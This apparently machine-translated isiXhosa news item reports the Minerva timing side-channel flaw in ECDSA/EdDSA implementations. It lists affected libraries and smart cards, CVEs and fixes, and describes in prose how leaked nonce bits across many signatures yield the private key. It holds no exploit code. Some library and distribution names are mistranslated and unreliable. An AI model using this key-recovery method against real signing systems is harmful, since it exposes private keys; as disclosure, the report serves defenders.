Ubuchwephesha obuNtsha boHlaselo lweSitishi secala lokuFumana amaqhosha e-ECDSA

Abaphandi abavela kwiYunivesithi. Masaryk tyhila ulwazi malunga ubuthathaka ekuphunyezweni okuhlukahlukeneyo kwe-algorithm yokudala utyikityo lwedijithali ye-ECDSA/EdDSA, ekuvumela ukuba ubuyisele ixabiso leqhosha labucala elisekelwe kuhlalutyo lokuvuza kolwazi malunga namasuntswana omntu ngamnye avelayo xa usebenzisa iindlela zokuhlalutya zomntu wesithathu. Ubuthathaka babizwa ngokuba nguMinerva.

Iiprojekthi ezaziwayo kakhulu ezichatshazelwa yindlela ecetywayo yokuhlaselwa yi-OpenJDK/OracleJDK (CVE-2019-2894) kunye nethala leencwadi. libgcrypt (CVE-2019-13627) esetyenziswa kwi-GnuPG. Ikwachaphazeleka nengxaki MatrixSSL, I-Crypto++, wolfCrypt, elliptic, jsrsasign, ipython-ecdsa, ruby_ecdsa, fastecdsa, lula-ecc kunye ne-Athena IDProtect smart cards. Ayivavanywa, kodwa iValid S/A IDflex V, SafeNet eToken 4300 kunye neTecSec Armored Card amakhadi, asebenzisa imodyuli eqhelekileyo ye-ECDSA, nazo zibhengezwe njengasesichengeni.

Ingxaki sele ilungisiwe ekukhutshweni kwe-libgcrypt 1.8.5 kunye ne-wolfCrypt 4.1.0, iiprojekthi eziseleyo azikaveli ukuhlaziywa. Ungalandelela ulungiso lobuthathaka kwiphakheji ye-libgcrypt kunikezelo kula maphepha: Debian, Ubuntu, RHEL, Fedora, vulaSUSE / SUSE, FreeBSD, igophe.

Ubuthathaka ayichaphazeleki I-OpenSSL, iBotan, imbedTLS kunye neBoringSSL. Ayikavavanywa iMozilla NSS, LibreSSL, Nettle, BearSSL, cryptlib, OpenSSL kwimowudi yeFIPS, Microsoft .NET crypto,
libkcapi ukusuka kwiLinux kernel, iSodium kunye neGnuTLS.

Ingxaki ibangelwa kukukwazi ukumisela amaxabiso eebhithi zomntu ngamnye ngexesha lokuphindaphinda kwe-scalar kwimisebenzi ye-elliptic curve. Iindlela ezingathanga ngqo, ezinjengokuqikelela ukulibaziseka kokubala, zisetyenziselwa ukukhupha ulwazi oluncinci. Uhlaselo lufuna ufikelelo olungeyomfuneko kumamkeli apho utyikityo lwedijithali lwenziwa khona (hayi ngaphandle kunye nokuhlaselwa okude, kodwa kunzima kakhulu kwaye kufuna inani elikhulu ledatha yokuhlalutya, ngoko kunokuthi kuthathwe njengento engenakwenzeka). Yokulayisha iyafumaneka izixhobo ezisetyenziselwa ukuhlasela.

Ngaphandle kobukhulu obungabalulekanga bokuvuza, kwi-ECDSA ukufunyanwa kwamasuntswana ambalwa ngolwazi malunga nevektha yokuqalisa (i-nonce) kwanele ukwenza uhlaselo lokubuyisela ngokulandelelana isitshixo sabucala siphela. Ngokwababhali bendlela, ukubuyisela ngempumelelo isitshixo, uhlalutyo lwamakhulu aliqela ukuya kwamawaka aliqela otyikityo lwedijithali oluveliswe kwimiyalezo eyaziwayo kumhlaseli lwanele. Ngokomzekelo, i-90 lamawaka esayinwe yedijithali yahlalutywa kusetyenziswa i-secp256r1 ijika eli-elliptic ukumisela isitshixo sangasese esisetyenziswe kwi-smart card ye-Athena IDProtect esekelwe kwi-Inside Secure AT11SC chip. Ixesha lokuhlaselwa lilonke laliyimizuzu engama-30.

umthombo: opennet.ru